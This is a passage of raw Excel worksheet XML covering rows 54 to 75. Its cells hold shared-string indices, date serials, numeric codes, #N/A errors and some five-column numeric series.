      <c r="R54" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S54" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T54" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U54" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V54" s="83">
        <v>38</v>
      </c>
      <c r="W54" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="55" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A55" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B55" s="51">
        <v>44446.77641377315</v>
      </c>
      <c r="C55" s="1" t="s">
        <v>1062</v>
      </c>
      <c r="D55" s="26">
        <v>120</v>
      </c>
      <c r="E55" s="1" t="s">
        <v>1075</v>
      </c>
      <c r="F55" s="26">
        <v>100</v>
      </c>
      <c r="G55" s="57" t="s">
        <v>1076</v>
      </c>
      <c r="H55" s="1" t="s">
        <v>1077</v>
      </c>
      <c r="I55" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J55" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K55" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L55" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M55" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N55" s="1"/>
      <c r="O55" s="1"/>
      <c r="P55" s="1"/>
      <c r="Q55" s="1" t="s">
        <v>3510</v>
      </c>
      <c r="R55" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S55" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T55" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U55" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V55" s="83">
        <v>33</v>
      </c>
      <c r="W55" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="56" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A56" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B56" s="51">
        <v>44405.437080625001</v>
      </c>
      <c r="C56" s="1" t="s">
        <v>1078</v>
      </c>
      <c r="D56" s="43">
        <v>200</v>
      </c>
      <c r="E56" s="1" t="s">
        <v>1079</v>
      </c>
      <c r="F56" s="26">
        <v>112</v>
      </c>
      <c r="G56" s="1" t="s">
        <v>1080</v>
      </c>
      <c r="H56" s="1" t="s">
        <v>1081</v>
      </c>
      <c r="I56" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J56" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K56" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L56" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M56" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N56" s="1"/>
      <c r="O56" s="1" t="s">
        <v>1082</v>
      </c>
      <c r="P56" s="1"/>
      <c r="Q56" s="1" t="s">
        <v>3511</v>
      </c>
      <c r="R56" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S56" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T56" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U56" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V56" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W56" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="57" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A57" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B57" s="51">
        <v>44405.437080717595</v>
      </c>
      <c r="C57" s="1" t="s">
        <v>1078</v>
      </c>
      <c r="D57" s="43">
        <v>200</v>
      </c>
      <c r="E57" s="1" t="s">
        <v>1084</v>
      </c>
      <c r="F57" s="26">
        <v>200</v>
      </c>
      <c r="G57" s="1" t="s">
        <v>1085</v>
      </c>
      <c r="H57" s="1" t="s">
        <v>1086</v>
      </c>
      <c r="I57" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J57" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K57" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L57" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M57" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N57" s="1"/>
      <c r="O57" s="1" t="s">
        <v>1087</v>
      </c>
      <c r="P57" s="1"/>
      <c r="Q57" s="1" t="s">
        <v>3511</v>
      </c>
      <c r="R57" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S57" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T57" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U57" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V57" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W57" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="58" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A58" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B58" s="51">
        <v>44405.437080671298</v>
      </c>
      <c r="C58" s="1" t="s">
        <v>1078</v>
      </c>
      <c r="D58" s="43">
        <v>200</v>
      </c>
      <c r="E58" s="1" t="s">
        <v>1084</v>
      </c>
      <c r="F58" s="26">
        <v>112</v>
      </c>
      <c r="G58" s="1" t="s">
        <v>1085</v>
      </c>
      <c r="H58" s="1" t="s">
        <v>1086</v>
      </c>
      <c r="I58" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J58" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K58" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L58" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M58" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N58" s="1"/>
      <c r="O58" s="1" t="s">
        <v>1087</v>
      </c>
      <c r="P58" s="1"/>
      <c r="Q58" s="1" t="s">
        <v>3511</v>
      </c>
      <c r="R58" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S58" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T58" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U58" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V58" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W58" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="59" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A59" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B59" s="51">
        <v>44313.446493738425</v>
      </c>
      <c r="C59" s="1" t="s">
        <v>1094</v>
      </c>
      <c r="D59" s="43">
        <v>100</v>
      </c>
      <c r="E59" s="1" t="s">
        <v>1095</v>
      </c>
      <c r="F59" s="26">
        <v>100</v>
      </c>
      <c r="G59" s="1" t="s">
        <v>1096</v>
      </c>
      <c r="H59" s="1" t="s">
        <v>1097</v>
      </c>
      <c r="I59" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J59" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K59" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L59" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M59" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N59" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O59" s="1"/>
      <c r="P59" s="1"/>
      <c r="Q59" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R59" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S59" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T59" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U59" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V59" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W59" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="60" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A60" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B60" s="51">
        <v>44068.684262800925</v>
      </c>
      <c r="C60" s="1" t="s">
        <v>1099</v>
      </c>
      <c r="D60" s="43">
        <v>100</v>
      </c>
      <c r="E60" s="1" t="s">
        <v>1100</v>
      </c>
      <c r="F60" s="26">
        <v>100</v>
      </c>
      <c r="G60" s="1" t="s">
        <v>1101</v>
      </c>
      <c r="H60" s="1" t="s">
        <v>1102</v>
      </c>
      <c r="I60" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J60" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K60" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L60" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M60" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N60" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O60" s="1" t="s">
        <v>1103</v>
      </c>
      <c r="P60" s="1"/>
      <c r="Q60" s="1" t="s">
        <v>3512</v>
      </c>
      <c r="R60" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S60" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T60" s="83">
        <v>2</v>
      </c>
      <c r="U60" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V60" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W60" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="61" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A61" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B61" s="51">
        <v>44474.595500729163</v>
      </c>
      <c r="C61" s="1" t="s">
        <v>1107</v>
      </c>
      <c r="D61" s="43">
        <v>101</v>
      </c>
      <c r="E61" s="1" t="s">
        <v>1108</v>
      </c>
      <c r="F61" s="26">
        <v>101</v>
      </c>
      <c r="G61" s="1" t="s">
        <v>1109</v>
      </c>
      <c r="H61" s="1" t="s">
        <v>1110</v>
      </c>
      <c r="I61" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J61" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K61" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L61" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M61" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N61" s="1"/>
      <c r="O61" s="1"/>
      <c r="P61" s="1"/>
      <c r="Q61" s="1" t="s">
        <v>3513</v>
      </c>
      <c r="R61" s="83">
        <v>2980</v>
      </c>
      <c r="S61" s="83">
        <v>2782</v>
      </c>
      <c r="T61" s="83">
        <v>2435</v>
      </c>
      <c r="U61" s="83">
        <v>2131</v>
      </c>
      <c r="V61" s="83">
        <v>3708</v>
      </c>
      <c r="W61" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="62" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A62" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B62" s="51">
        <v>44145.687615787036</v>
      </c>
      <c r="C62" s="1" t="s">
        <v>1121</v>
      </c>
      <c r="D62" s="43">
        <v>100</v>
      </c>
      <c r="E62" s="1" t="s">
        <v>1122</v>
      </c>
      <c r="F62" s="26">
        <v>100</v>
      </c>
      <c r="G62" s="1" t="s">
        <v>1123</v>
      </c>
      <c r="H62" s="1" t="s">
        <v>1124</v>
      </c>
      <c r="I62" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J62" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K62" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L62" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M62" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N62" s="1" t="s">
        <v>1125</v>
      </c>
      <c r="O62" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P62" s="1"/>
      <c r="Q62" s="1" t="s">
        <v>3514</v>
      </c>
      <c r="R62" s="83">
        <v>6071</v>
      </c>
      <c r="S62" s="83">
        <v>5132</v>
      </c>
      <c r="T62" s="83">
        <v>6178</v>
      </c>
      <c r="U62" s="83">
        <v>8587</v>
      </c>
      <c r="V62" s="83">
        <v>13047</v>
      </c>
      <c r="W62" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="63" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A63" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B63" s="51">
        <v>44599.734224305554</v>
      </c>
      <c r="C63" s="1" t="s">
        <v>1143</v>
      </c>
      <c r="D63" s="43">
        <v>218</v>
      </c>
      <c r="E63" s="1" t="s">
        <v>1144</v>
      </c>
      <c r="F63" s="26">
        <v>104</v>
      </c>
      <c r="G63" s="1" t="s">
        <v>1145</v>
      </c>
      <c r="H63" s="1" t="s">
        <v>1146</v>
      </c>
      <c r="I63" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J63" s="1" t="s">
        <v>226</v>
      </c>
      <c r="K63" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L63" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M63" s="1" t="s">
        <v>308</v>
      </c>
      <c r="N63" s="1" t="s">
        <v>309</v>
      </c>
      <c r="O63" s="1"/>
      <c r="P63" s="1"/>
      <c r="Q63" s="1" t="s">
        <v>3515</v>
      </c>
      <c r="R63" s="83">
        <v>2979</v>
      </c>
      <c r="S63" s="83">
        <v>2786</v>
      </c>
      <c r="T63" s="83">
        <v>2423</v>
      </c>
      <c r="U63" s="83">
        <v>2122</v>
      </c>
      <c r="V63" s="83">
        <v>2379</v>
      </c>
      <c r="W63" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="64" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A64" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B64" s="51">
        <v>44126.670747928241</v>
      </c>
      <c r="C64" s="1" t="s">
        <v>1143</v>
      </c>
      <c r="D64" s="43">
        <v>110</v>
      </c>
      <c r="E64" s="1" t="s">
        <v>1148</v>
      </c>
      <c r="F64" s="26">
        <v>100</v>
      </c>
      <c r="G64" s="1" t="s">
        <v>1149</v>
      </c>
      <c r="H64" s="1" t="s">
        <v>1150</v>
      </c>
      <c r="I64" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J64" s="1" t="s">
        <v>226</v>
      </c>
      <c r="K64" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L64" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M64" s="1" t="s">
        <v>308</v>
      </c>
      <c r="N64" s="1" t="s">
        <v>309</v>
      </c>
      <c r="O64" s="1" t="s">
        <v>1151</v>
      </c>
      <c r="P64" s="1"/>
      <c r="Q64" s="1" t="s">
        <v>3516</v>
      </c>
      <c r="R64" s="83">
        <v>20913</v>
      </c>
      <c r="S64" s="83">
        <v>228308</v>
      </c>
      <c r="T64" s="83">
        <v>269274</v>
      </c>
      <c r="U64" s="83">
        <v>665987</v>
      </c>
      <c r="V64" s="83">
        <v>613589</v>
      </c>
      <c r="W64" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="65" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A65" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B65" s="51">
        <v>44599.734224259257</v>
      </c>
      <c r="C65" s="1" t="s">
        <v>1143</v>
      </c>
      <c r="D65" s="43">
        <v>218</v>
      </c>
      <c r="E65" s="1" t="s">
        <v>1148</v>
      </c>
      <c r="F65" s="26">
        <v>216</v>
      </c>
      <c r="G65" s="1" t="s">
        <v>1149</v>
      </c>
      <c r="H65" s="1" t="s">
        <v>1153</v>
      </c>
      <c r="I65" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J65" s="1" t="s">
        <v>226</v>
      </c>
      <c r="K65" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L65" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M65" s="1" t="s">
        <v>308</v>
      </c>
      <c r="N65" s="1" t="s">
        <v>309</v>
      </c>
      <c r="O65" s="1" t="s">
        <v>1151</v>
      </c>
      <c r="P65" s="1"/>
      <c r="Q65" s="1" t="s">
        <v>3515</v>
      </c>
      <c r="R65" s="83">
        <v>20913</v>
      </c>
      <c r="S65" s="83">
        <v>228308</v>
      </c>
      <c r="T65" s="83">
        <v>269274</v>
      </c>
      <c r="U65" s="83">
        <v>665987</v>
      </c>
      <c r="V65" s="83">
        <v>613589</v>
      </c>
      <c r="W65" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="66" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A66" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B66" s="51">
        <v>44152.496694965281</v>
      </c>
      <c r="C66" s="1" t="s">
        <v>1143</v>
      </c>
      <c r="D66" s="43">
        <v>110</v>
      </c>
      <c r="E66" s="1" t="s">
        <v>1154</v>
      </c>
      <c r="F66" s="26">
        <v>100</v>
      </c>
      <c r="G66" s="1" t="s">
        <v>1155</v>
      </c>
      <c r="H66" s="1" t="s">
        <v>1156</v>
      </c>
      <c r="I66" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J66" s="49" t="s">
        <v>226</v>
      </c>
      <c r="K66" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L66" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M66" s="1" t="s">
        <v>308</v>
      </c>
      <c r="N66" s="1" t="s">
        <v>309</v>
      </c>
      <c r="O66" s="1" t="s">
        <v>1157</v>
      </c>
      <c r="P66" s="1"/>
      <c r="Q66" s="1" t="s">
        <v>3516</v>
      </c>
      <c r="R66" s="83">
        <v>111917</v>
      </c>
      <c r="S66" s="83">
        <v>142428</v>
      </c>
      <c r="T66" s="83">
        <v>111778</v>
      </c>
      <c r="U66" s="83">
        <v>126742</v>
      </c>
      <c r="V66" s="83">
        <v>134285</v>
      </c>
      <c r="W66" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="67" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A67" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B67" s="51">
        <v>44462.622378622684</v>
      </c>
      <c r="C67" s="1" t="s">
        <v>1143</v>
      </c>
      <c r="D67" s="43">
        <v>218</v>
      </c>
      <c r="E67" s="1" t="s">
        <v>1154</v>
      </c>
      <c r="F67" s="26">
        <v>105</v>
      </c>
      <c r="G67" s="1" t="s">
        <v>1155</v>
      </c>
      <c r="H67" s="1" t="s">
        <v>1156</v>
      </c>
      <c r="I67" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J67" s="1" t="s">
        <v>226</v>
      </c>
      <c r="K67" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L67" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M67" s="1" t="s">
        <v>308</v>
      </c>
      <c r="N67" s="1" t="s">
        <v>309</v>
      </c>
      <c r="O67" s="1" t="s">
        <v>1157</v>
      </c>
      <c r="P67" s="1"/>
      <c r="Q67" s="1" t="s">
        <v>3515</v>
      </c>
      <c r="R67" s="83">
        <v>111917</v>
      </c>
      <c r="S67" s="83">
        <v>142428</v>
      </c>
      <c r="T67" s="83">
        <v>111778</v>
      </c>
      <c r="U67" s="83">
        <v>126742</v>
      </c>
      <c r="V67" s="83">
        <v>134285</v>
      </c>
      <c r="W67" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="68" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A68" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B68" s="51">
        <v>44462.622378657405</v>
      </c>
      <c r="C68" s="1" t="s">
        <v>1143</v>
      </c>
      <c r="D68" s="43">
        <v>218</v>
      </c>
      <c r="E68" s="1" t="s">
        <v>1158</v>
      </c>
      <c r="F68" s="26">
        <v>104</v>
      </c>
      <c r="G68" s="1" t="s">
        <v>1159</v>
      </c>
      <c r="H68" s="1" t="s">
        <v>1160</v>
      </c>
      <c r="I68" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J68" s="1" t="s">
        <v>226</v>
      </c>
      <c r="K68" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L68" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M68" s="1" t="s">
        <v>308</v>
      </c>
      <c r="N68" s="1" t="s">
        <v>309</v>
      </c>
      <c r="O68" s="1" t="s">
        <v>1161</v>
      </c>
      <c r="P68" s="1"/>
      <c r="Q68" s="1" t="s">
        <v>3515</v>
      </c>
      <c r="R68" s="83">
        <v>2984</v>
      </c>
      <c r="S68" s="83">
        <v>2783</v>
      </c>
      <c r="T68" s="83">
        <v>2422</v>
      </c>
      <c r="U68" s="83">
        <v>2144</v>
      </c>
      <c r="V68" s="83">
        <v>3436</v>
      </c>
      <c r="W68" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="69" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A69" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B69" s="51">
        <v>44462.622378668981</v>
      </c>
      <c r="C69" s="1" t="s">
        <v>1143</v>
      </c>
      <c r="D69" s="43">
        <v>218</v>
      </c>
      <c r="E69" s="1" t="s">
        <v>1162</v>
      </c>
      <c r="F69" s="26">
        <v>102</v>
      </c>
      <c r="G69" s="1" t="s">
        <v>1163</v>
      </c>
      <c r="H69" s="1" t="s">
        <v>1164</v>
      </c>
      <c r="I69" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J69" s="1" t="s">
        <v>226</v>
      </c>
      <c r="K69" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L69" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M69" s="1" t="s">
        <v>308</v>
      </c>
      <c r="N69" s="1" t="s">
        <v>309</v>
      </c>
      <c r="O69" s="1" t="s">
        <v>1165</v>
      </c>
      <c r="P69" s="1"/>
      <c r="Q69" s="1" t="s">
        <v>3515</v>
      </c>
      <c r="R69" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S69" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T69" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U69" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V69" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W69" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="70" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A70" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B70" s="51">
        <v>44599.734224282409</v>
      </c>
      <c r="C70" s="1" t="s">
        <v>1143</v>
      </c>
      <c r="D70" s="43">
        <v>218</v>
      </c>
      <c r="E70" s="1" t="s">
        <v>1166</v>
      </c>
      <c r="F70" s="26">
        <v>106</v>
      </c>
      <c r="G70" s="1" t="s">
        <v>1167</v>
      </c>
      <c r="H70" s="1" t="s">
        <v>1168</v>
      </c>
      <c r="I70" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J70" s="1" t="s">
        <v>226</v>
      </c>
      <c r="K70" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L70" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M70" s="1" t="s">
        <v>308</v>
      </c>
      <c r="N70" s="1" t="s">
        <v>309</v>
      </c>
      <c r="O70" s="1" t="s">
        <v>1157</v>
      </c>
      <c r="P70" s="1"/>
      <c r="Q70" s="1" t="s">
        <v>3515</v>
      </c>
      <c r="R70" s="83">
        <v>3663</v>
      </c>
      <c r="S70" s="83">
        <v>8815</v>
      </c>
      <c r="T70" s="83">
        <v>7134</v>
      </c>
      <c r="U70" s="83">
        <v>6422</v>
      </c>
      <c r="V70" s="83">
        <v>2469</v>
      </c>
      <c r="W70" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="71" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A71" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B71" s="51">
        <v>43949.460110196756</v>
      </c>
      <c r="C71" s="1" t="s">
        <v>1169</v>
      </c>
      <c r="D71" s="43">
        <v>110</v>
      </c>
      <c r="E71" s="1" t="s">
        <v>1170</v>
      </c>
      <c r="F71" s="26">
        <v>100</v>
      </c>
      <c r="G71" s="1" t="s">
        <v>1171</v>
      </c>
      <c r="H71" s="1" t="s">
        <v>1172</v>
      </c>
      <c r="I71" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J71" s="1" t="s">
        <v>226</v>
      </c>
      <c r="K71" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L71" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M71" s="1" t="s">
        <v>308</v>
      </c>
      <c r="N71" s="1" t="s">
        <v>309</v>
      </c>
      <c r="O71" s="1" t="s">
        <v>1173</v>
      </c>
      <c r="P71" s="1" t="s">
        <v>1174</v>
      </c>
      <c r="Q71" s="1" t="s">
        <v>3517</v>
      </c>
      <c r="R71" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S71" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T71" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U71" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V71" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W71" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="72" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A72" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B72" s="51">
        <v>43984.606301539352</v>
      </c>
      <c r="C72" s="1" t="s">
        <v>1169</v>
      </c>
      <c r="D72" s="43">
        <v>110</v>
      </c>
      <c r="E72" s="1" t="s">
        <v>1176</v>
      </c>
      <c r="F72" s="26">
        <v>100</v>
      </c>
      <c r="G72" s="1" t="s">
        <v>1177</v>
      </c>
      <c r="H72" s="1" t="s">
        <v>1178</v>
      </c>
      <c r="I72" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J72" s="1" t="s">
        <v>226</v>
      </c>
      <c r="K72" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L72" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M72" s="1" t="s">
        <v>308</v>
      </c>
      <c r="N72" s="1" t="s">
        <v>309</v>
      </c>
      <c r="O72" s="1" t="s">
        <v>1179</v>
      </c>
      <c r="P72" s="1" t="s">
        <v>504</v>
      </c>
      <c r="Q72" s="1" t="s">
        <v>3517</v>
      </c>
      <c r="R72" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S72" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T72" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U72" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V72" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W72" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="73" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A73" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B73" s="51">
        <v>43984.606301516207</v>
      </c>
      <c r="C73" s="1" t="s">
        <v>1169</v>
      </c>
      <c r="D73" s="43">
        <v>110</v>
      </c>
      <c r="E73" s="1" t="s">
        <v>1180</v>
      </c>
      <c r="F73" s="26">
        <v>100</v>
      </c>
      <c r="G73" s="1" t="s">
        <v>1181</v>
      </c>
      <c r="H73" s="1" t="s">
        <v>1182</v>
      </c>
      <c r="I73" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J73" s="1" t="s">
        <v>226</v>
      </c>
      <c r="K73" s="3" t="s">
        <v>27</v>
      </c>
      <c r="L73" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M73" s="1" t="s">
        <v>308</v>
      </c>
      <c r="N73" s="1" t="s">
        <v>309</v>
      </c>
      <c r="O73" s="1" t="s">
        <v>1151</v>
      </c>
      <c r="P73" s="1" t="s">
        <v>504</v>
      </c>
      <c r="Q73" s="1" t="s">
        <v>3517</v>
      </c>
      <c r="R73" s="83">
        <v>7141</v>
      </c>
      <c r="S73" s="83">
        <v>7231</v>
      </c>
      <c r="T73" s="83">
        <v>8824</v>
      </c>
      <c r="U73" s="83">
        <v>8983</v>
      </c>
      <c r="V73" s="83">
        <v>9468</v>
      </c>
      <c r="W73" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="74" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A74" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B74" s="51">
        <v>44399.427325983794</v>
      </c>
      <c r="C74" s="1" t="s">
        <v>1183</v>
      </c>
      <c r="D74" s="43">
        <v>101</v>
      </c>
      <c r="E74" s="1" t="s">
        <v>1184</v>
      </c>
      <c r="F74" s="26">
        <v>101</v>
      </c>
      <c r="G74" s="1" t="s">
        <v>1185</v>
      </c>
      <c r="H74" s="1" t="s">
        <v>1186</v>
      </c>
      <c r="I74" s="1" t="s">
        <v>203</v>
      </c>
      <c r="J74" s="1" t="s">
        <v>204</v>
      </c>
      <c r="K74" s="3" t="s">
        <v>28</v>
      </c>
      <c r="L74" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M74" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N74" s="1"/>
      <c r="O74" s="1"/>
      <c r="P74" s="1"/>
      <c r="Q74" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R74" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S74" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T74" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U74" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V74" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W74" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="75" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A75" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B75" s="51">
        <v>44594.610880381944</v>
      </c>
      <c r="C75" s="1" t="s">
        <v>1187</v>
      </c>
      <c r="D75" s="43">
        <v>101</v>
      </c>
      <c r="E75" s="1" t="s">
        <v>1188</v>
      </c>
      <c r="F75" s="26">
        <v>101</v>
      </c>
      <c r="G75" s="1" t="s">
        <v>1189</v>
      </c>
      <c r="H75" s="1" t="s">
        <v>1190</v>
      </c>
